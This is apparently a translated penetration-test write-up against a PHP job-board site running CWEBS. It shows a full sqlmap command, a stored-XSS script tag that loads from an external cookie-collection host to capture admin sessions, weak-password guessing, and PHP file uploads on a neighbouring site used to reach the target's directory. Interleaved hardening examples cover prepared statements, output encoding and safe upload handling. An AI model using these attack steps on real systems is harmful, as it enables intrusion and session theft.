Authorized penetration test of the XX Talent Network

Source: Internet
Author: User
Tags: upload, php

Author: Liuker. Original: http://www.anying.org/thread-88-1-1.html (please credit the source when reposting).

0x1 Preface: I really didn't know what to write. The current web penetration methods are all much the same, so I wrote up the most recent project instead.

0x2 Background

XX Talent Network had been hacked, so they asked our company for a penetration test. The site had already been compromised several times, and the test turned out to be difficult.

0x3 Information gathering

IP: XXX.XX.XX.X
Port: 80
Script: PHP
Environment: Linux + "IIS 9.0". Linux with IIS looks odd, but the explanation is simple: the "IIS 9.0" is just a modified Apache Server banner.

The program is CWEBS, a paid (commercial) package.

The target site has user registration and file upload.

0x4 Scanning

A tool scan of http://www.xxxx.com/info.php
turned up sensitive information such as the absolute path of the website; only the details used in this article are listed here.
/home/web0906p1/htdocs/info.php
The admin panel is at http://www.xxxx.com/admin
An injection point was found:
http://www.xxxx.com/?Ctl=Query&act=File&typeid=455
FCKeditor is present:
http://www.xxxx.com/plus/FCKedit...nnectors/test.html#
58 neighbouring sites on the same server also run Cwebs.

0x5 Testing and exploiting the vulnerabilities found

The upload path is disclosed during the upload process, and the user name is used as the upload directory:

/Upfiles/Person//111.asp/40fe81afefd207b403e3c5acd3a0984c.jpg
Not IIS 6.0, so this leads nowhere.
Fuzzing the extension with a Burp Suite payload list shows that PHP extensions are filtered, and JSP is not executed.

FCKeditor has been switched to a whitelist.

The injection vulnerability was tested as follows:
python "C:\Tools\sqlmapgui\sqlmap.py" -v 1 --beep --eta --batch -u "http://www.xxxx.com/?Ctl=Query&act=File&typeid=455" --level=3 --risk=2 --data="XM=1111&SFZ=1" --cookie="PHPSESSID=10f9b3c61c2cd1_a6fd28a42442221" --dbms=mysql --technique BEUST --union-cols=1-10 --time-sec=5 --banner --current-user --current-db --is-dba --users --dbs

Figure 1

The injection then always returned 403.
Apparently an NFS firewall.
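The 403 responses above show something in front of the application blocking sqlmap's requests, but a filter in front of a concatenated query is not a fix for the query. The following is an added example, not CWEBS code: a lookup of the shape behind ?act=File&typeid=455 with POST fields XM and SFZ, written first with string concatenation and then with a PDO prepared statement, run against an in-memory SQLite table. The table and column names are assumptions and the sample rows are constructed.

```php
<?php
// Added example (not CWEBS code): the same lookup done unsafely and with
// prepared statements. Requires the pdo_sqlite extension for the demo.
declare(strict_types=1);

// VULNERABLE: request values are pasted straight into the SQL text.
function findFilesUnsafe(PDO $db, string $typeid, string $xm, string $sfz): array
{
    $sql = "SELECT id, title FROM files WHERE typeid = $typeid AND xm = '$xm' AND sfz = '$sfz'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: check the shape of each value, then bind every value as a parameter
// so the database never sees user input as SQL syntax.
function findFiles(PDO $db, string $typeid, string $xm, string $sfz): array
{
    if (!ctype_digit($typeid) || strlen($typeid) > 9) {
        throw new InvalidArgumentException('typeid must be a small positive integer');
    }
    if (strlen($xm) > 50 || strlen($sfz) > 18) {
        throw new InvalidArgumentException('name or id number too long');
    }
    $stmt = $db->prepare(
        'SELECT id, title FROM files WHERE typeid = :typeid AND xm = :xm AND sfz = :sfz'
    );
    $stmt->execute([':typeid' => (int) $typeid, ':xm' => $xm, ':sfz' => $sfz]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demonstration with constructed data in an in-memory SQLite database.
// On MySQL also set PDO::ATTR_EMULATE_PREPARES to false so the server,
// not the driver, does the parameter binding.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE files (id INTEGER PRIMARY KEY, typeid INTEGER, xm TEXT, sfz TEXT, title TEXT)');
$db->exec("INSERT INTO files (typeid, xm, sfz, title) VALUES
           (455, '1111', '1', 'public notice'),
           (455, 'other', '2', 'someone else''s file')");

// Constructed test input: the classic boolean probe in the SFZ field.
$probe = "1' OR '1'='1";
echo count(findFilesUnsafe($db, '455', '1111', $probe)), " rows from the unsafe query\n";    // 2: every row
echo count(findFiles($db, '455', '1111', $probe)), " rows from the prepared query\n";        // 0: literal match only
```

The unsafe version returns both rows because the injected OR rewrites the WHERE clause; the prepared version compares the whole probe string literally against the sfz column and finds nothing. The length and ctype checks are there to reject garbage early and give a clean 400, not as the security boundary; the binding is.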

Then an online consultation form was spotted on the main site.
Figure 2

We found that it has an XSS vulnerability.
The following was inserted into the title field:
<script src="http://xssing.me/api1694"></script>
Figure 3

Then wait for cookies to arrive.
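The consultation-form XSS above works because the stored title is echoed into the admin page unencoded and the session cookie is readable from script. As an added example (not CWEBS code), the PHP below renders a consultation record with output encoding and starts the session with HttpOnly, Secure and SameSite cookie flags plus a restrictive Content-Security-Policy, so an injected <script> tag is shown as text and, even if some other injection slipped through, document.cookie would not expose the session. The record layout and field names are assumptions, the sample record is constructed, and the array form of session_set_cookie_params needs PHP 7.3 or later.

```php
<?php
// Added example (not CWEBS code): output encoding for stored user input and
// session cookie hardening for an admin page that displays it.
declare(strict_types=1);

/** Encode a string for insertion into HTML text or a double-quoted attribute. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render one consultation record as an HTML fragment; every field is encoded. */
function renderConsultation(array $row): string
{
    return '<div class="consultation" data-id="' . h((string) $row['id']) . '">'
         . '<h3>' . h($row['title']) . '</h3>'
         . '<p>' . nl2br(h($row['body'])) . '</p>'
         . '</div>';
}

/**
 * Start the session so that its cookie is unreadable from script and only sent
 * over HTTPS, and tell the browser to run scripts from this origin only.
 * Must be called before any output is sent.
 */
function startHardenedSession(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,      // HTTPS only
        'httponly' => true,      // document.cookie cannot read it
        'samesite' => 'Strict',
    ]);
    session_start();
}

// Constructed sample record whose title carries a script tag, as in the write-up.
// The host name is a placeholder.
$sample = [
    'id'    => 7,
    'title' => '<script src="http://attacker.example/hook.js"></script>',
    'body'  => "Hello,\nI have a question about a job posting.",
];

echo renderConsultation($sample), "\n";
// The title is emitted as &lt;script src=&quot;...&quot;&gt; inside the <h3>,
// so the browser displays it as text instead of fetching and running it.
```

Encoding at output time is what stops the stored payload; it has to be applied in every template that shows the field, including the admin side that the write-up targets. The cookie flags and CSP are defence in depth: they do not remove the XSS, but they deny the "wait for cookies" step even when one slips through.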

0x6 Cwebs

It took three hours of looking at the site.

www.1111.com, a neighbouring site on the same server: its website-feedback form allows arbitrary file upload.
Figure 4

Upload a PHP file and obtain its address.

http://1111.com/tell/web_idea.ph...540e581f720a2a0.php
Annoyingly, the file is simply served as a download rather than executed, but we can confirm that 00f3cf0b74840a2b3540e581f720a2a0.php is the file name.
Then look for the paths of some other files on the site.
Annoying. The admin panel is just as painful.
Tried weak-password combinations with Burp Suite:
simply 1111 / 1111 (1111 stands for the domain name).
Getting into the admin panel was still painful, though.
A simple backend.
The admin panel does not support Opera.
No IE 6.0 was available.
Only the browser's element inspector could be used.
http://1111.com//admin/news/news_mng.php
News management interface.
Click to edit a news article.
Figure 7

Since any script could be uploaded on the frontend, the backend upload should be unrestricted as well.
Upload a PHP file and view the source:
http://1111.com/images/gist/20130305145927%0%.php
Figure 8
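Both upload paths in this write-up come down to the same handler design: the profile upload on the target site only blacklisted PHP extensions and used the user name as the directory, and the feedback and admin uploads on the neighbouring site accepted anything. The following is an added example, not CWEBS code: an upload handler that whitelists extensions, checks the file content with finfo, names the file from random bytes, and stores it outside the document root. The /var/uploads directory, the "attachment" form field and the idea of serving files back through a separate download script are assumptions.

```php
<?php
// Added example (not CWEBS code): a hardened file upload handler.
// Assumptions: UPLOAD_DIR is outside the web root and is not mapped by the
// web server; files are served back by a separate script that looks them up
// by an opaque id, so the stored path never reaches the client.
declare(strict_types=1);

const UPLOAD_DIR = '/var/uploads';          // assumption: not web-accessible
const MAX_BYTES  = 2 * 1024 * 1024;         // 2 MiB
const ALLOWED    = [                        // extension => MIME type the bytes must match
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'pdf'  => 'application/pdf',
];

/**
 * Validate one $_FILES entry and move it to a random, non-executable name.
 * Returns the stored path; throws RuntimeException with a log-safe reason.
 */
function storeUpload(array $file, string $dir = UPLOAD_DIR): string
{
    if (!isset($file['error']) || is_array($file['error'])) {
        throw new RuntimeException('malformed upload');
    }
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . $file['error']);
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Whitelist, not blacklist: only the final extension counts, lower-cased,
    // so "x.php.jpg" is judged as "jpg" and then re-checked by content below.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }

    // Never trust the client-supplied Content-Type; sniff the actual bytes.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }

    // Do not derive the directory or file name from anything the user controls
    // (the user name, as on the target site, became a path component). Use random bytes.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($dir, '/') . '/' . $name;

    if (!is_uploaded_file($file['tmp_name']) || !move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);                     // readable by the app, never executable
    return $dest;
}

// Usage (the form field name "attachment" is an assumption).
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['attachment'])) {
    try {
        $path = storeUpload($_FILES['attachment']);
        echo 'stored';                      // hand the client an opaque id, never $path
    } catch (RuntimeException $e) {
        http_response_code(400);
        error_log('upload rejected: ' . $e->getMessage());
        echo 'upload rejected';
    }
}
```

Three of these choices each close one step used in the write-up: the whitelist removes the extension-fuzzing game that the blacklist invited, the random name removes the user-name directory, and storing outside the document root means that even a file that somehow passes is downloaded or not reachable at all rather than executed. If uploads must live under the web root for some reason, the web server should additionally be configured to never hand that directory to the PHP interpreter.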
Then combine this with the path of the target site:
/home/web0906p1/htdocs/info.php
Tried cross-site access (reaching the target site's directory from the neighbouring site).
Success.
Figure 9

Then the cookies arrived at the XSS platform.
Figure 10

Then log in to the admin panel.
Figure 11

That is as far as it goes; I am exhausted.
